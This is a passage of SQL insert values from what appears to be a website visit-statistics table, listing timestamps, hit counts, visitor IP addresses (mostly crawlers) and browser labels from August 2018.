(283669,1533571614,1,1,0,0,'54.36.149.45','other'),(283670,1533571822,1,1,0,0,'216.244.66.241','other'),(283671,1533571823,1,1,0,0,'54.36.148.116','other'),(283672,1533571930,1,1,0,0,'54.36.149.106','other'),(283673,1533571932,1,1,0,0,'54.36.148.174','other'),(283674,1533572060,1,1,0,0,'178.93.183.137','firefox'),(283675,1533572128,1,1,0,0,'54.36.148.144','other'),(283676,1533572168,1,1,0,0,'5.79.86.15','other'),(283677,1533572229,1,1,0,0,'54.36.149.77','other'),(283678,1533572570,1,1,0,0,'8.29.198.27','other'),(283679,1533572627,1,1,0,0,'54.36.148.149','other'),(283680,1533572889,1,1,0,0,'141.8.142.74','other'),(283681,1533572988,1,1,0,0,'54.36.148.198','other'),(283682,1533573027,1,1,0,0,'54.36.148.11','other'),(283683,1533573195,1,1,0,0,'54.36.148.40','other'),(283684,1533573279,1,1,0,0,'54.36.148.182','other'),(283685,1533573408,1,1,0,0,'54.36.149.80','other'),(283686,1533573511,1,1,0,0,'54.36.149.90','other'),(283687,1533573815,1,1,0,0,'54.36.149.60','other'),(283688,1533573824,2,2,0,0,'216.244.66.241','other'),(283689,1533573853,1,1,0,0,'188.230.43.254','other'),(283690,1533573866,1,1,0,0,'54.36.148.62','other'),(283691,1533574007,1,1,0,0,'213.179.252.65','chrome'),(283692,1533574458,1,1,0,0,'54.36.149.74','other'),(283693,1533574546,1,1,0,0,'178.154.171.88','other'),(283694,1533574549,1,0,1,0,'66.249.66.156',''),(283695,1533574657,1,1,0,0,'54.36.148.134','other'),(283696,1533574708,1,1,0,0,'54.36.148.78','other'),(283697,1533574998,1,1,0,0,'54.36.148.92','other'),(283698,1533575141,1,1,0,0,'54.36.149.56','other'),(283699,1533575377,1,1,0,0,'54.165.59.7','other'),(283700,1533575748,1,1,0,0,'185.62.57.215','other'),(283701,1533576082,1,1,0,0,'54.36.148.178','other'),(283702,1533576232,1,1,0,0,'188.230.43.254','other'),(283703,1533576433,3,3,0,0,'216.244.66.241','other'),(283704,1533576745,1,1,0,0,'54.36.149.67','other'),(283705,1533576757,1,1,0,0,'54.36.148.187','other'),(283706,1533576807,1,1,0,0,'54.36.149.5','other'),(283707,1533577075,1,1,0,0,'54.36.149.17','other'),(283708,1533577081,1,1,0,0,'54.36.149.107','other'),(283709,1533577339,1,1,0,0,'54.36.148.56','other'),(283710,1533577624,1,1,0,0,'54.36.148.253','other'),(283711,1533577675,1,1,0,0,'54.36.148.30','other'),(283712,1533577963,1,1,0,0,'54.36.148.15','other'),(283713,1533578293,1,1,0,0,'54.36.148.247','other'),(283714,1533578630,1,1,0,0,'188.230.43.254','other'),(283715,1533578778,1,1,0,0,'54.36.149.52','other'),(283716,1533578838,1,1,0,0,'54.36.149.22','other'),(283717,1533579094,4,4,0,0,'216.244.66.241','other'),(283718,1533579333,1,1,0,0,'212.21.66.6','other'),(283719,1533579464,1,1,0,0,'54.36.148.210','other'),(283720,1533579565,1,1,0,0,'54.36.149.94','other'),(283721,1533579635,1,1,0,0,'54.36.148.47','other'),(283722,1533579806,1,1,0,0,'54.36.148.93','other'),(283723,1533579934,1,1,0,0,'54.36.148.124','other'),(283724,1533579943,1,1,0,0,'54.36.148.213','other'),(283725,1533580026,1,1,0,0,'95.163.255.155','other'),(283726,1533580132,1,1,0,0,'54.36.148.157','other'),(283727,1533580216,1,1,0,0,'54.36.149.45','other'),(283728,1533580226,1,1,0,0,'54.36.149.89','other'),(283729,1533580274,1,1,0,0,'87.250.224.96','other'),(283730,1533580492,1,1,0,0,'54.36.149.50','other'),(283731,1533580570,1,1,0,0,'54.36.149.99','other'),(283732,1533580571,1,1,0,0,'176.113.170.104','firefox'),(283733,1533580635,1,1,0,0,'54.36.148.60','other'),(283734,1533580678,1,1,0,0,'178.154.200.8','other'),(283735,1533581026,1,1,0,0,'188.230.43.254','other'),(283736,1533581104,1,1,0,0,'54.36.148.244','other'),(283737,1533581204,1,1,0,0,'54.36.148.68','other'),(283738,1533581319,1,1,0,0,'54.36.148.224','other'),(283739,1533581555,1,1,0,0,'54.36.148.234','other'),(283740,1533581799,1,1,0,0,'8.29.198.27','other'),(283741,1533581949,1,1,0,0,'54.36.148.39','other'),(283742,1533581966,1,1,0,0,'54.36.149.25','other'),(283743,1533582234,1,1,0,0,'54.36.148.117','other'),(283744,1533582689,1,1,0,0,'54.36.148.206','other'),(283745,1533582770,1,1,0,0,'141.8.142.74','other'),(283746,1533582936,1,1,0,0,'185.220.101.10','other'),(283747,1533583045,1,1,0,0,'54.36.148.216','other'),(283748,1533583102,1,1,0,0,'178.154.171.88','other'),(283749,1533583231,1,1,0,0,'151.57.65.185','chrome'),(283750,1533583391,1,1,0,0,'91.201.246.40','chrome'),(283751,1533583471,1,1,0,0,'8.29.198.26','other'),(283752,1533583807,1,1,0,0,'107.21.1.8','other'),(283753,1533583809,1,1,0,0,'54.208.102.37','other'),(283754,1533583894,1,1,0,0,'54.36.148.93','other'),(283755,1533583976,1,1,0,0,'54.36.149.48','other'),(283756,1533584033,1,1,0,0,'54.36.148.90','other'),(283757,1533584061,1,1,0,0,'54.36.149.77','other'),(283758,1533584108,1,1,0,0,'54.36.148.42','other'),(283759,1533584153,1,1,0,0,'54.36.148.38','other'),(283760,1533584230,1,1,0,0,'54.36.148.67','other'),(283761,1533584251,1,1,0,0,'91.209.11.236','other'),(283762,1533584577,1,1,0,0,'54.36.148.250','other'),(283763,1533584670,1,1,0,0,'54.36.148.72','other'),(283764,1533584766,1,1,0,0,'54.36.149.104','other'),(283765,1533584899,1,1,0,0,'54.36.148.29','other'),(283766,1533584938,1,1,0,0,'54.36.148.25','other'),(283767,1533585212,1,1,0,0,'54.36.148.217','other'),(283768,1533585413,3,3,0,0,'178.154.171.88','other'),(283769,1533585526,1,1,0,0,'37.73.206.207','chrome'),(283770,1533585766,1,1,0,0,'54.36.148.240','other'),(283771,1533586345,1,1,0,0,'54.36.148.91','other'),(283772,1533586486,1,1,0,0,'178.92.156.236','chrome'),(283773,1533586596,1,1,0,0,'54.36.148.227','other'),(283774,1533586610,1,1,0,0,'54.36.149.90','other'),(283775,1533586641,1,1,0,0,'54.36.148.195','other'),(283776,1533586714,1,1,0,0,'54.36.149.14','other'),(283777,1533586721,1,1,0,0,'54.36.148.72','other'),(283778,1533586923,2,2,0,0,'216.244.66.241','other'),(283779,1533587046,1,1,0,0,'54.36.149.23','other'),(283780,1533587138,1,1,0,0,'54.36.148.17','other'),(283781,1533587490,1,1,0,0,'54.36.148.162','other'),(283782,1533587604,1,1,0,0,'54.36.148.131','other'),(283783,1533587921,1,1,0,0,'54.36.149.38','other'),(283784,1533588092,1,1,0,0,'54.36.148.61','other'),(283785,1533588231,1,1,0,0,'54.36.148.45','other'),(283786,1533588486,1,0,1,0,'66.249.66.155',''),(283787,1533588527,2,2,0,0,'141.8.142.74','other'),(283788,1533589018,1,1,0,0,'40.77.167.114','other'),(283789,1533589120,2,2,0,0,'216.244.66.241','other'),(283790,1533589577,1,1,0,0,'178.154.171.88','other'),(283791,1533590126,1,1,0,0,'80.82.215.17','other'),(283792,1533590188,1,1,0,0,'192.243.53.51','other'),(283793,1533590439,2,2,0,0,'141.8.142.74','other'),(283794,1533591443,1,0,1,0,'66.249.66.156',''),(283795,1533591695,1,1,0,0,'216.244.66.241','other'),(283796,1533591960,1,1,0,0,'95.163.255.103','other'),(283797,1533591972,1,1,0,0,'95.163.255.108','other'),(283798,1533592058,1,1,0,0,'54.36.149.102','other'),(283799,1533592095,1,1,0,0,'54.36.148.186','other'),(283800,1533592151,1,1,0,0,'141.8.142.74','other'),(283801,1533592677,1,1,0,0,'8.29.198.27','other'),(283802,1533592698,1,1,0,0,'54.36.149.62','other'),(283803,1533592702,1,1,0,0,'54.36.148.208','other'),(283804,1533593071,1,1,0,0,'95.163.255.99','other'),(283805,1533593352,1,1,0,0,'54.36.148.20','other'),(283806,1533593367,1,1,0,0,'54.36.148.201','other'),(283807,1533593490,7,7,0,0,'157.55.39.190','other'),(283808,1533593734,1,1,0,0,'37.233.103.114','other'),(283809,1533593752,4,4,0,0,'207.46.13.188','other'),(283810,1533593757,3,3,0,0,'207.46.13.87','other'),(283811,1533594091,1,1,0,0,'54.36.149.84','other'),(283812,1533594348,1,1,0,0,'8.29.198.26','other'),(283813,1533594471,1,1,0,0,'54.36.148.182','other'),(283814,1533594870,2,2,0,0,'216.244.66.241','other'),(283815,1533595122,1,1,0,0,'141.8.142.74','other'),(283816,1533595236,1,1,0,0,'54.36.148.191','other'),(283817,1533595461,1,1,0,0,'54.36.148.179','other'),(283818,1533595557,1,1,0,0,'54.36.149.0','other'),(283819,1533595626,1,1,0,0,'54.36.148.114','other'),(283820,1533595786,1,1,0,0,'54.36.148.133','other'),(283821,1533595797,1,1,0,0,'216.244.66.241','other'),(283822,1533596162,1,1,0,0,'54.36.148.84','other'),(283823,1533596264,1,0,1,0,'66.249.66.157',''),(283824,1533596515,2,0,2,0,'66.249.66.61',''),(283825,1533596790,1,1,0,0,'5.45.207.58','other'),(283826,1533597140,1,1,0,0,'54.36.149.34','other'),(283827,1533597167,3,0,3,0,'66.249.66.57',''),(283828,1533597215,1,1,0,0,'54.36.148.248','other'),(283829,1533597334,1,1,0,0,'185.100.87.206','other'),(283830,1533597524,3,3,0,0,'216.244.66.241','other'),(283831,1533597529,1,1,0,0,'54.36.149.56','other'),(283832,1533597882,2,0,2,0,'66.249.66.157',''),(283834,1533597999,1,1,0,0,'66.249.66.59','chrome'),(283835,1533598118,1,1,0,0,'66.249.66.157','chrome'),(283836,1533598280,1,0,1,0,'66.249.66.155',''),(283837,1533598453,1,1,0,0,'54.36.148.37','other'),(283838,1533598648,2,2,0,0,'91.209.11.236','other'),(283839,1533598721,1,1,0,0,'54.36.148.29','other'),(283840,1533598894,1,1,0,0,'178.154.171.88','other'),(283841,1533598999,1,1,0,0,'54.36.149.96','other'),(283842,1533599115,1,1,0,0,'54.36.149.20','other'),(283843,1533599216,1,1,0,0,'54.36.149.71','other'),(283844,1533599501,2,1,1,0,'66.249.66.155',''),(283845,1533600137,1,1,0,0,'54.36.148.218','other'),(283846,1533600566,1,1,0,0,'66.249.66.59','chrome'),(283847,1533600630,1,1,0,0,'54.36.148.216','other'),(283848,1533600638,1,1,0,0,'54.36.149.34','other'),(283849,1533600650,1,1,0,0,'216.244.66.241','other'),(283850,1533600707,1,1,0,0,'54.36.149.24','other'),(283851,1533600792,2,0,2,0,'66.249.66.57',''),(283852,1533600924,1,1,0,0,'185.220.101.7','other'),(283853,1533601648,1,0,1,0,'66.249.66.59',''),(283854,1533601985,1,1,0,0,'66.249.66.157','chrome'),(283855,1533602196,2,2,0,0,'141.8.142.74','other'),(283856,1533602472,1,1,0,0,'89.178.238.76','chrome'),(283857,1533602795,1,1,0,0,'217.69.143.48','other'),(283858,1533603558,1,1,0,0,'8.29.198.26','other'),(283859,1533604521,1,1,0,0,'185.220.101.13','other'),(283860,1533605217,1,1,0,0,'8.29.198.27','other'),(283861,1533605827,1,1,0,0,'52.41.211.72','chrome'),(283862,1533605974,2,2,0,0,'66.249.66.157','chrome'),(283863,1533606226,2,2,0,0,'66.249.66.155','chrome'),(283864,1533606460,1,1,0,0,'66.249.66.57','chrome'),(283865,1533606471,1,1,0,0,'95.163.255.156','other'),(283866,1533606718,3,2,1,0,'66.249.66.156',''),(283867,1533606721,1,0,1,0,'66.249.66.61',''),(283868,1533606955,1,0,1,0,'66.249.66.59',''),(283869,1533607884,4,3,1,0,'66.249.66.156',''),(283870,1533607995,3,0,3,0,'66.249.66.57',''),(283871,1533608043,2,1,1,0,'66.249.66.155',''),(283872,1533608099,1,0,1,0,'66.249.66.61',''),(283873,1533608152,4,3,1,0,'66.249.66.155',''),(283874,1533608432,1,1,0,0,'54.36.149.43','other'),(283875,1533608529,2,1,1,0,'66.249.66.156',''),(283876,1533608542,1,1,0,0,'66.249.66.61','chrome'),(283877,1533609010,1,1,0,0,'52.53.201.78','chrome'),(283878,1533609153,1,1,0,0,'54.36.148.99','other'),(283879,1533609315,2,1,1,0,'66.249.66.59',''),(283880,1533609394,1,1,0,0,'54.36.148.84','other'),(283881,1533609428,1,1,0,0,'54.36.148.27','other'),(283882,1533609589,1,1,0,0,'54.36.148.103','other'),(283883,1533609609,1,1,0,0,'54.36.148.221','other'),(283884,1533609654,1,0,1,0,'66.249.66.157',''),(283885,1533609662,3,3,0,0,'66.249.66.156','chrome'),(283886,1533609683,4,3,1,0,'66.249.66.155',''),(283887,1533609733,1,1,0,0,'66.249.66.61','chrome'),(283888,1533609896,1,1,0,0,'54.36.149.42','other'),(283889,1533610256,2,2,0,0,'95.213.141.126','opera'),(283890,1533610565,2,2,0,0,'216.244.66.241','other'),(283891,1533610577,3,2,1,0,'66.249.66.155',''),(283892,1533610651,1,1,0,0,'66.249.66.156','chrome'),(283893,1533610829,1,1,0,0,'54.36.149.32','other'),(283894,1533611188,1,1,0,0,'54.36.148.168','other'),(283895,1533611239,1,1,0,0,'54.36.148.135','other'),(283896,1533611537,1,1,0,0,'54.36.148.150','other'),(283897,1533611808,1,0,1,0,'66.249.66.156',''),(283898,1533611818,1,1,0,0,'54.36.149.5','other'),(283899,1533611821,1,1,0,0,'66.249.66.155','chrome'),(283900,1533611845,1,1,0,0,'54.36.149.61','other'),(283901,1533612186,10,10,0,0,'144.76.186.38','other'),(283902,1533612343,1,1,0,0,'54.36.149.103','other'),(283903,1533613115,7,5,2,0,'66.249.66.155',''),(283904,1533613122,1,1,0,0,'54.36.148.192','other'),(283905,1533613191,1,1,0,0,'54.36.148.209','other'),(283906,1533613261,2,2,0,0,'66.249.66.156','chrome'),(283907,1533613286,1,0,1,0,'66.249.66.57',''),(283908,1533613390,1,1,0,0,'54.36.149.35','other'),(283909,1533613604,1,1,0,0,'54.36.148.204','other'),(283910,1533613718,1,1,0,0,'66.249.66.155','chrome'),(283911,1533613850,1,1,0,0,'216.244.66.241','other'),(283912,1533613889,1,1,0,0,'141.8.142.74','other'),(283913,1533614197,1,1,0,0,'54.36.148.214','other'),(283914,1533614425,1,1,0,0,'8.29.198.25','other'),(283915,1533614429,1,1,0,0,'54.36.149.56','other'),(283916,1533614486,1,0,1,0,'66.249.66.61',''),(283917,1533614523,1,1,0,0,'54.36.148.172','other'),(283918,1533614562,1,1,0,0,'54.36.148.191','other'),(283919,1533614857,1,1,0,0,'54.36.149.52','other'),(283920,1533614893,1,1,0,0,'91.209.11.236','other'),(283921,1533615359,1,1,0,0,'51.15.63.43','other'),(283922,1533615726,1,1,0,0,'216.244.66.241','other'),(283923,1533615834,1,1,0,0,'54.36.148.52','other'),(283924,1533615837,1,1,0,0,'207.46.13.188','other'),(283925,1533615881,1,1,0,0,'54.36.149.50','other'),(283926,1533615932,1,1,0,0,'54.36.149.18','other'),(283927,1533615981,3,3,0,0,'144.76.186.38','other'),(283928,1533616046,1,1,0,0,'54.36.149.41','other'),(283929,1533616049,1,1,0,0,'54.36.149.6','other'),(283930,1533616097,1,1,0,0,'8.29.198.26','other'),(283931,1533616124,1,1,0,0,'54.36.148.227','other'),(283932,1533616173,1,1,0,0,'54.36.148.60','other'),(283933,1533616276,1,1,0,0,'54.36.149.100','other'),(283934,1533616339,1,1,0,0,'54.36.148.206','other'),(283935,1533616697,1,1,0,0,'54.36.148.230','other'),(283936,1533616903,1,1,0,0,'54.36.148.217','other'),(283937,1533616938,1,1,0,0,'54.36.149.26','other'),(283938,1533617274,1,1,0,0,'54.36.148.250','other'),(283939,1533617519,1,1,0,0,'54.36.148.35','other'),(283940,1533617534,1,1,0,0,'54.36.148.28','other'),(283941,1533617689,1,1,0,0,'185.153.230.71','firefox'),(283942,1533618111,1,1,0,0,'54.36.149.62','other'),(283943,1533618154,1,1,0,0,'54.36.148.237','other'),(283944,1533618190,1,1,0,0,'157.55.39.190','other'),(283945,1533618272,2,2,0,0,'216.244.66.241','other'),(283946,1533618293,1,1,0,0,'54.36.148.159','other'),(283947,1533618306,1,0,1,0,'66.249.66.156',''),(283948,1533618540,1,1,0,0,'54.36.148.208','other'),(283949,1533618592,1,1,0,0,'92.113.41.17','chrome'),(283950,1533618679,1,1,0,0,'54.36.148.95','other'),(283951,1533618714,1,1,0,0,'54.36.148.254','other'),(283952,1533618760,1,1,0,0,'54.36.148.17','other'),(283953,1533618928,1,1,0,0,'51.15.63.43','other'),(283954,1533619042,1,1,0,0,'54.36.148.109','other'),(283955,1533619214,1,1,0,0,'91.196.178.169','chrome'),(283956,1533619334,1,1,0,0,'95.134.61.176','firefox'),(283957,1533619356,1,1,0,0,'54.36.149.79','other'),(283958,1533619448,1,1,0,0,'54.36.148.16','other'),(283959,1533619510,1,1,0,0,'54.36.149.26','other'),(283960,1533619884,1,1,0,0,'66.249.66.57','chrome'),(283961,1533619966,1,1,0,0,'54.36.148.114','other'),(283962,1533620128,1,1,0,0,'91.196.177.46','chrome'),(283963,1533620405,1,1,0,0,'157.55.39.190','other'),(283964,1533620543,1,1,0,0,'54.36.148.111','other'),(283965,1533620858,1,1,0,0,'54.36.149.84','other'),(283966,1533620948,1,1,0,0,'216.244.66.241','other'),(283967,1533621090,3,3,0,0,'91.196.178.71','chrome'),(283968,1533621141,1,1,0,0,'54.36.149.105','other'),(283969,1533621204,1,1,0,0,'54.36.148.65','other'),(283970,1533621382,1,1,0,0,'54.36.148.40','other'),(283971,1533621392,1,1,0,0,'54.36.149.32','other'),(283972,1533621610,1,1,0,0,'54.36.148.51','other'),(283973,1533621963,1,1,0,0,'54.36.148.68','other'),(283974,1533621993,1,1,0,0,'91.196.178.71','chrome'),(283975,1533622047,1,1,0,0,'54.36.148.81','other'),(283976,1533622134,1,1,0,0,'54.36.148.71','other'),(283977,1533622238,1,1,0,0,'54.36.149.92','other'),(283978,1533622291,1,1,0,0,'54.36.148.136','other'),(283979,1533622578,1,1,0,0,'54.36.149.102','other'),(283980,1533622858,1,1,0,0,'66.249.66.57','chrome'),(283981,1533622984,1,1,0,0,'66.249.66.61','chrome'),(283982,1533623602,1,1,0,0,'157.55.39.190','other'),(283983,1533623745,1,1,0,0,'54.36.148.211','other'),(283984,1533624147,1,1,0,0,'141.8.142.74','other'),(283985,1533624178,1,1,0,0,'54.36.149.5','other'),(283986,1533624204,1,1,0,0,'54.36.148.167','other'),(283987,1533624295,1,1,0,0,'54.36.148.152','other'),(283988,1533624359,1,1,0,0,'54.36.148.77','other'),(283989,1533624371,1,1,0,0,'216.244.66.241','other'),(283990,1533624457,1,1,0,0,'91.196.178.169','chrome'),(283991,1533624481,1,1,0,0,'54.36.148.18','other'),(283992,1533624650,1,1,0,0,'91.196.178.161','firefox'),(283993,1533624703,1,1,0,0,'95.163.255.98','other'),(283994,1533624782,1,1,0,0,'54.36.149.36','other'),(283995,1533625305,1,1,0,0,'8.29.198.25','other'),(283996,1533625416,1,1,0,0,'54.36.148.12','other'),(283997,1533625450,1,1,0,0,'54.36.149.89','other'),(283998,1533625741,1,1,0,0,'91.196.178.166','chrome'),(283999,1533625911,1,1,0,0,'37.204.246.199','msie'),(284000,1533625994,2,2,0,0,'54.36.148.135','other'),(284001,1533626370,1,0,1,0,'66.249.66.59',''),(284002,1533626420,1,1,0,0,'54.36.148.109','other'),(284003,1533626778,1,1,0,0,'54.36.148.51','other'),(284004,1533626853,1,1,0,0,'195.230.119.59','chrome'),(284005,1533626919,1,1,0,0,'54.36.148.222','other'),(284006,1533626965,1,1,0,0,'8.29.198.26','other'),(284008,1533627178,1,1,0,0,'54.36.148.218','other'),(284009,1533627314,1,1,0,0,'54.36.148.189','other'),(284010,1533627316,1,1,0,0,'54.36.148.33','other'),(284011,1533627395,1,1,0,0,'54.36.148.110','other'),(284012,1533627515,1,1,0,0,'207.46.13.188','other'),(284013,1533627529,1,1,0,0,'54.36.148.205','other'),(284014,1533627779,1,1,0,0,'54.36.149.62','other'),(284015,1533627968,1,1,0,0,'54.36.148.75','other'),(284016,1533628077,1,1,0,0,'54.36.149.69','other'),(284017,1533628108,1,1,0,0,'54.36.148.73','other'),(284018,1533628181,1,1,0,0,'54.36.148.111','other'),(284019,1533628190,1,1,0,0,'54.36.148.223','other'),(284020,1533628435,1,1,0,0,'157.55.39.190','other'),(284021,1533628467,1,1,0,0,'54.36.148.225','other'),(284022,1533628750,1,1,0,0,'54.36.148.253','other'),(284023,1533628878,1,1,0,0,'54.36.148.176','other'),(284024,1533628951,1,1,0,0,'91.196.178.75','chrome'),(284025,1533628988,1,1,0,0,'54.36.148.43','other'),(284026,1533629001,1,1,0,0,'216.244.66.241','other'),(284027,1533629014,1,1,0,0,'54.36.148.210','other'),(284028,1533629069,1,1,0,0,'54.36.149.98','other'),(284029,1533629448,1,1,0,0,'54.36.148.226','other'),(284030,1533629505,1,1,0,0,'54.36.148.203','other'),(284031,1533629695,1,1,0,0,'93.80.34.22','chrome'),(284032,1533629752,1,1,0,0,'185.220.101.33','other'),(284033,1533629780,1,1,0,0,'54.36.148.254','other'),(284034,1533629850,1,1,0,0,'91.196.178.80','chrome'),(284035,1533629937,1,1,0,0,'54.36.149.10','other'),(284037,1533630086,1,1,0,0,'54.36.148.107','other'),(284038,1533630385,1,1,0,0,'54.36.148.159','other'),(284039,1533630425,1,1,0,0,'66.249.66.157','chrome'),(284040,1533630445,1,0,1,0,'66.249.66.156',''),(284041,1533630554,1,1,0,0,'54.36.149.61','other'),(284042,1533630627,1,1,0,0,'54.165.59.7','other'),(284043,1533630865,1,1,0,0,'54.36.148.111','other'),(284044,1533630998,1,1,0,0,'54.36.148.171','other'),(284045,1533631392,1,1,0,0,'54.36.149.101','other'),(284046,1533631442,1,1,0,0,'216.244.66.241','other'),(284047,1533631767,1,1,0,0,'54.36.149.63','other'),(284048,1533632346,1,1,0,0,'54.36.148.148','other'),(284049,1533632458,1,1,0,0,'54.36.148.185','other'),(284050,1533632477,1,1,0,0,'91.196.178.172','chrome'),(284051,1533632483,1,1,0,0,'54.36.148.94','other'),(284052,1533632579,2,2,0,0,'54.165.59.7','other'),(284053,1533632767,1,1,0,0,'91.196.178.102','chrome'),(284054,1533632808,1,1,0,0,'54.36.148.74','other'),(284055,1533632817,1,1,0,0,'54.36.148.239','other'),(284056,1533632826,1,1,0,0,'54.36.148.141','other'),(284057,1533632950,1,1,0,0,'54.36.148.64','other'),(284058,1533633096,1,1,0,0,'54.36.148.216','other'),(284059,1533633115,1,1,0,0,'54.36.148.251','other'),(284060,1533633406,1,1,0,0,'91.196.178.135','chrome'),(284061,1533633414,1,1,0,0,'51.15.63.43','other'),(284062,1533633534,1,1,0,0,'54.36.148.52','other'),(284063,1533633883,1,1,0,0,'199.58.86.211','other'),(284064,1533633972,1,1,0,0,'54.36.149.91','other'),(284065,1533634142,3,3,0,0,'54.165.59.7','other'),(284066,1533634275,1,1,0,0,'54.36.148.230','other'),(284067,1533634320,1,1,0,0,'91.196.178.172','chrome'),(284068,1533634647,2,2,0,0,'216.244.66.241','other'),(284069,1533634894,1,1,0,0,'54.36.148.108','other'),(284070,1533634937,1,1,0,0,'54.36.149.41','other'),(284071,1533635037,1,1,0,0,'54.36.148.127','other'),(284072,1533635044,1,1,0,0,'54.36.148.123','other'),(284073,1533635073,1,1,0,0,'54.36.149.21','other'),(284074,1533635196,1,1,0,0,'54.36.148.35','other'),(284075,1533635354,1,1,0,0,'54.36.148.45','other'),(284076,1533635684,1,1,0,0,'66.249.66.156','chrome'),(284077,1533635879,1,1,0,0,'91.196.178.169','chrome'),(284078,1533636057,2,2,0,0,'54.165.59.7','other'),(284079,1533636172,1,1,0,0,'8.29.198.27','other'),(284080,1533636201,1,1,0,0,'54.36.149.63','other'),(284081,1533636238,1,1,0,0,'94.178.37.161','opera'),(284082,1533636246,1,1,0,0,'216.244.66.241','other'),(284083,1533636327,1,1,0,0,'54.36.149.32','other'),(284084,1533636692,1,1,0,0,'195.201.221.241','other'),(284085,1533636936,1,1,0,0,'46.182.18.40','other'),(284086,1533636976,1,1,0,0,'91.196.178.172','chrome'),(284087,1533637022,1,1,0,0,'54.36.148.254','other'),(284088,1533637075,1,1,0,0,'54.36.149.87','other'),(284089,1533637093,1,1,0,0,'54.36.148.121','other'),(284090,1533637437,1,1,0,0,'54.36.148.222','other'),(284091,1533637447,2,2,0,0,'91.196.178.102','chrome'),(284092,1533637563,1,1,0,0,'54.36.149.76','other'),(284093,1533637767,1,1,0,0,'54.36.149.104','other'),(284094,1533637856,1,1,0,0,'8.29.198.26','other'),(284095,1533638045,1,1,0,0,'54.36.148.241','other'),(284096,1533638070,1,1,0,0,'54.36.148.192','other'),(284097,1533638198,1,1,0,0,'54.36.148.13','other'),(284098,1533638287,1,1,0,0,'54.36.149.81','other'),(284099,1533638392,1,1,0,0,'54.36.148.18','other'),(284100,1533638598,1,1,0,0,'141.8.142.74','other'),(284101,1533639147,1,1,0,0,'54.36.148.57','other'),(284102,1533639245,3,3,0,0,'216.244.66.241','other'),(284103,1533639297,1,1,0,0,'54.36.148.211','other'),(284104,1533639617,1,1,0,0,'54.36.148.176','other'),(284105,1533639824,1,1,0,0,'54.36.149.57','other'),(284106,1533640008,1,1,0,0,'54.36.148.114','other'),(284107,1533640328,1,1,0,0,'54.36.148.166','other'),(284108,1533640333,1,1,0,0,'54.36.149.9','other'),(284109,1533640527,1,1,0,0,'54.37.153.16','other'),(284110,1533640536,1,0,1,0,'66.249.66.61',''),(284111,1533641055,2,2,0,0,'54.36.148.252','other'),(284112,1533641115,1,1,0,0,'54.36.148.10','other'),(284113,1533641206,1,1,0,0,'54.36.148.158','other'),(284114,1533641555,1,1,0,0,'54.36.149.9','other'),(284115,1533641708,1,1,0,0,'54.36.149.62','other'),(284116,1533641786,2,2,0,0,'216.244.66.241','other'),(284117,1533641792,1,1,0,0,'54.36.148.250','other'),(284118,1533641996,1,1,0,0,'91.196.178.172','chrome'),(284119,1533642018,1,1,0,0,'141.8.142.74','other'),(284120,1533642049,1,1,0,0,'54.36.149.25','other'),(284121,1533642318,1,1,0,0,'54.36.149.14','other'),(284122,1533642554,1,1,0,0,'54.36.148.182','other'),(284123,1533642616,1,1,0,0,'54.36.148.252','other'),(284124,1533642749,1,1,0,0,'216.244.66.241','other'),(284125,1533642785,1,1,0,0,'54.36.149.74','other'),(284126,1533642838,1,1,0,0,'54.36.149.31','other'),(284127,1533642888,1,1,0,0,'54.36.148.80','other'),(284128,1533642895,1,1,0,0,'54.36.148.36','other'),(284129,1533643197,2,2,0,0,'91.196.178.172','chrome'),(284130,1533643296,1,1,0,0,'54.36.148.43','other'),(284131,1533643399,1,1,0,0,'54.36.149.66','other'),(284132,1533643411,1,1,0,0,'54.36.148.175','other'),(284133,1533644131,1,1,0,0,'77.247.181.165','other'),(284134,1533644176,1,1,0,0,'141.8.142.74','other'),(284135,1533644184,3,3,0,0,'216.244.66.241','other'),(284136,1533644328,1,1,0,0,'91.196.178.172','chrome'),(284137,1533644818,1,1,0,0,'54.36.148.156','other'),(284138,1533645548,1,1,0,0,'91.196.178.172','chrome'),(284139,1533645557,1,1,0,0,'54.36.148.186','other'),(284140,1533645580,1,1,0,0,'54.36.148.101','other'),(284141,1533645720,1,1,0,0,'66.249.66.57','chrome'),(284142,1533645761,1,1,0,0,'188.165.214.26','other'),(284143,1533646146,1,1,0,0,'94.153.208.164','chrome'),(284144,1533646489,1,1,0,0,'54.36.148.21','other'),(284145,1533646650,1,1,0,0,'141.8.142.74','other'),(284146,1533646721,1,1,0,0,'77.111.244.22','chrome'),(284147,1533646766,1,1,0,0,'54.36.148.205','other'),(284148,1533646869,1,1,0,0,'157.55.39.190','other'),(284149,1533646892,2,2,0,0,'91.196.178.169','chrome'),(284150,1533647026,2,2,0,0,'216.244.66.241','other'),(284151,1533647056,1,1,0,0,'8.29.198.25','other'),(284152,1533647164,1,1,0,0,'178.154.171.88','other'),(284153,1533647364,1,1,0,0,'91.196.178.73','chrome'),(284154,1533647508,1,1,0,0,'37.53.206.124','msie'),(284155,1533648352,1,1,0,0,'91.209.11.236','other'),(284156,1533648761,1,1,0,0,'8.29.198.27','other'),(284157,1533648966,1,1,0,0,'91.196.178.80','chrome'),(284158,1533649365,2,2,0,0,'216.244.66.241','other'),(284159,1533649435,2,2,0,0,'176.98.75.214','other'),(284160,1533649619,1,1,0,0,'91.196.178.86','firefox'),(284161,1533650857,1,1,0,0,'138.201.239.219','chrome'),(284162,1533651333,1,1,0,0,'185.220.101.8','other'),(284163,1533651512,1,1,0,0,'77.111.244.22','chrome'),(284164,1533651732,1,1,0,0,'95.163.255.96','other'),(284165,1533652183,1,1,0,0,'40.77.167.114','other'),(284166,1533652309,1,1,0,0,'216.244.66.241','other'),(284167,1533654069,1,0,1,0,'66.249.66.57',''),(284168,1533654526,1,0,1,0,'66.249.66.61',''),(284169,1533654561,1,0,1,0,'66.249.66.59',''),(284170,1533654657,1,1,0,0,'54.36.148.176','other'),(284171,1533654663,1,1,0,0,'54.36.148.100','other'),(284172,1533655073,1,1,0,0,'54.36.148.191','other'),(284173,1533655541,1,1,0,0,'54.36.148.50','other'),(284174,1533655558,2,2,0,0,'216.244.66.241','other'),(284175,1533655640,1,1,0,0,'54.36.148.175','other'),(284176,1533655868,1,1,0,0,'54.36.148.148','other'),(284177,1533656454,1,1,0,0,'54.36.148.141','other'),(284178,1533656491,1,1,0,0,'54.36.148.203','other'),(284179,1533656664,1,1,0,0,'54.36.148.101','other'),(284180,1533656826,1,1,0,0,'54.36.148.91','other'),(284181,1533656935,1,1,0,0,'54.36.149.1','other'),(284182,1533656939,1,1,0,0,'54.36.149.54','other'),(284183,1533657119,1,1,0,0,'54.36.148.225','other'),(284184,1533657200,1,1,0,0,'178.154.171.88','other'),(284185,1533657406,2,2,0,0,'216.244.66.241','oth